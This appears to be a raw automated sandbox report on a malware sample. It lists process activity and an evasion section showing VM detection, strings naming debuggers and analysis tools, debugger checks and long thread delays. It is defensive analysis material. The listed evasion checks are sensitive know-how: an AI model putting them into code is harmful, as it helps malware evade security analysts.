Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7968, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\fontdrvhost.exe

API/Special instruction interceptor: Address: 7FFE2220D044

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.E
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""W
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 1800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 3560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 5560000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 47A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3288	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2625

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980	Thread sleep count: 5847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172	Thread sleep count: 2625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\fontdrvhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C7783C GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,_wcsnicmp,_snwprintf,lstrcpyW,

5_2_05C7783C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_05C770D6 VirtualQuery,VirtualQuery,memset,GetSystemInfo,memset,VirtualQuery,

5_2_05C770D6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_f367fb30-4a6d-4729-a18a-0a24b90a8c50\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_598857dc-8512-453a-af65-151ce81ace18\

Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: RegSvcs.exe, 00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: iQemU
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 0000001A.00000002.2982775109.00000260BA890000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.11.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: mshta.exe, 00000012.00000002.2545012704.00000211C8528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: mshta.exe, 00000012.00000002.2545012704.00000211C8528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0c91ef
Source: Amcache.hve.11.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual RAM
Source: fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C78AA1 mov eax, dword ptr fs:[00000030h]	5_2_05C78AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C78710 mov eax, dword ptr fs:[00000030h]	5_2_05C78710
